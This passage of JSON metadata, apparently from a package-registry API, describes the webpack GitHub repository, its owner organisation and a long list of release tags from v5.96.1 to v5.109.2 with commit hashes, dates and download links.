vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":nu